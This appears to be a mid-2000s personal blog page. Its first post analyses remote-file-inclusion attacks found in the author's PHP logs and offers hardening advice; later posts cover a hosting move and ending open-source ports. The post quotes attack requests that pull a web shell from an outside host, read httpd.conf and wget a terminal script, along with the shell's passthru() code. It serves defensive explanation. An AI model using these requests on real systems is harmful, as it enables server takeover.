While browsing my logs today, I discovered someone attempting to exploit PHP's fopen() support for URLs. This specific form of exploit dates back to at least 2003.

The relevant information (from the cached page above; it doesn't work here, so all you'd see is the first, failed attempt):

"GET /index.php?l=http://www.havenard.net/havenard/hack/cmd.txt?&chdir=/usr/local/apache/conf&cmd=cat%20httpd.conf HTTP/1.1"

"GET /index.php?l=http://www.havenard.net/havenard/hack/cmd.txt?&chdir=/somewhere/writeable&cmd=wget%20http://www.havenard.net/havenard/4843term.txt HTTP/1.1"

"GET /index.php?l=http://www.havenard.net/havenard/hack/cmd.txt?&chdir=/somewhere/writeable&cmd=mv%204843term.txt%20terminal.php HTTP/1.1"

So, I looked at the script that was being linked to (as a text file, from a Geocities site, which still has 'blocking' disabled for text files, for some legacy reason). Below follows some of the code:

if (!empty($cmd)) {
    @passthru("$cmd 2>&1");
    $output = ob_get_contents();
    if (!empty($output))
        echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
}

As you can see, this script is essentially just a wrapper around shell execution (passthru()), taking its command and a couple of other parameters from $_GET["cmd"] and friends; only, not quite that smart.

It's incredibly simple, old, and, well, sadly quite effective: many people still don't secure their sites, and blindly write code which works like the following:

if ( ! $var ) $var = "var";   // $var arrives straight from the request (register_globals style)
require("$var.html");

The above code is beyond bad. For one, it doesn't define a local path, which could easily be fixed with:

require("./$var.html");

(Although I still don't agree with this method, and this STILL isn't failsafe.)

I hate global variables, but once you parse your config, you can read the whole thing into an array held in a single variable, which you don't expose except where you have to.

This is also pretty messy: it lets you access only one global variable; however, it discloses everything in its array, which I consider to be bogus.

Protip: If you don't need to open files from an external site (which you shouldn't need to do; and if you do, use sockets, or a PEAR library), turn off URL access in fopen(). This is configurable in php.ini (the allow_url_fopen directive).
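As an added illustration (not code from the original post), here is the vulnerable include pattern beside an allow-list version of it; the page list, the pages/ directory, the realpath() check and the allow_url_include directive (PHP 5.2 and later) are my assumptions, not anything from the post.

```php
<?php
// Added example, not code from the original post.

// VULNERABLE: the pattern criticised above. $var comes straight from the
// request; with allow_url_fopen on, l=http://host/file.txt? fetches and runs
// remote code, and even with the "./" prefix a ../ traversal leaves the
// directory, so the prefix alone is not a fix.
function vulnerable_page_path($var)
{
    if (!$var) { $var = 'var'; }
    return "./$var.html";
}

// HARDENED: match the request against a fixed allow-list, then verify that
// the resolved path really sits inside the pages directory (assumed layout).
function safe_page_path($var, array $allowed, $base_dir)
{
    $name = is_string($var) ? $var : '';
    if (!in_array($name, $allowed, true)) {   // strict comparison, no coercion
        return null;                          // caller answers 404 / default page
    }
    $path = realpath($base_dir . '/' . $name . '.html');
    $base = realpath($base_dir);
    // realpath() collapses ../ and symlinks and returns false for a missing
    // file; reject anything that did not resolve to a file under $base_dir.
    if ($path === false || $base === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Belt and braces: refuse to serve at all while URL wrappers are enabled for
// fopen()/include. ini_get() returns "" or "0" when a directive is Off.
function url_wrappers_disabled()
{
    return !ini_get('allow_url_fopen') && !ini_get('allow_url_include');
}

$allowed   = array('home', 'about', 'contact');     // constructed page list
$requested = isset($_GET['l']) ? $_GET['l'] : 'home'; // same parameter as the log lines
$file      = url_wrappers_disabled()
           ? safe_page_path($requested, $allowed, __DIR__ . '/pages')
           : null;
if ($file === null) {
    header('HTTP/1.0 404 Not Found');
    exit;
}
require $file;
```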

I’ve moved from my hosting with ICDSoft in China to ICDSoft’s USA colocation.

Nameservice was updated by me in parallel with the move; anyone who cached (viewed) my page within the last few hours may have to wait up to 48 hours until it updates on their ISP's nameserver, but there IS a forward in place to the new location under an alternative name. CSS will be broken, and the site will be ugly, but it will still be functional.

Thanks for your swift, excellent service, ICDSoft.

[Update: Everything should be seeing the 'new' host, and yes, it may appear 'faster'.]

Please pardon the dust; I’ve moved out of my old software base into an entirely new, redesigned (if not prettier) system.

I have converted and imported all of my existing articles, but there has been no easy way to (re)classify them, as they're entirely incompatible data types. I've manually updated the last fifty articles, but note that browsing by article type does not yet reflect actual content.

As I am no longer actively maintaining open source software, the old posts will eventually be reclassified as legacy and deprecated, but left for the annals of time, and for those searching for information I've uncovered in the past.

Yes, you’ve read that right. I will no longer offer Mac OS X ports, builds, or other assistance with my own open source based efforts.

This has been a difficult decision; however, I can no longer afford the time or bandwidth once dedicated to these projects.

If you wish to take over as maintainer of any of my existing code, please contact me, and the original authors (where applicable); I’ll be more than happy to offer my existing build structure with all dependencies, and when necessary, my personal build notes and GNU Patch unified diffs.

I have notified the authors of my ported software, and will continue to host this unsupported software through March, 2006.

Update: MKVToolNix and OGMTools have found a new home. DOSBox is moving back in-house, and the Mac port of Bliss shall pass on with my silly little 'speak' utility.

Years ago, back in the OS 9 days, I purchased a license for Candy Crisis. It's followed me ever since, even though I've had to request a new serial number for it.

I decided to take a look to see whether it was still around. Even better: it's now free!

On behalf of many other Columns addicts: thank you, John!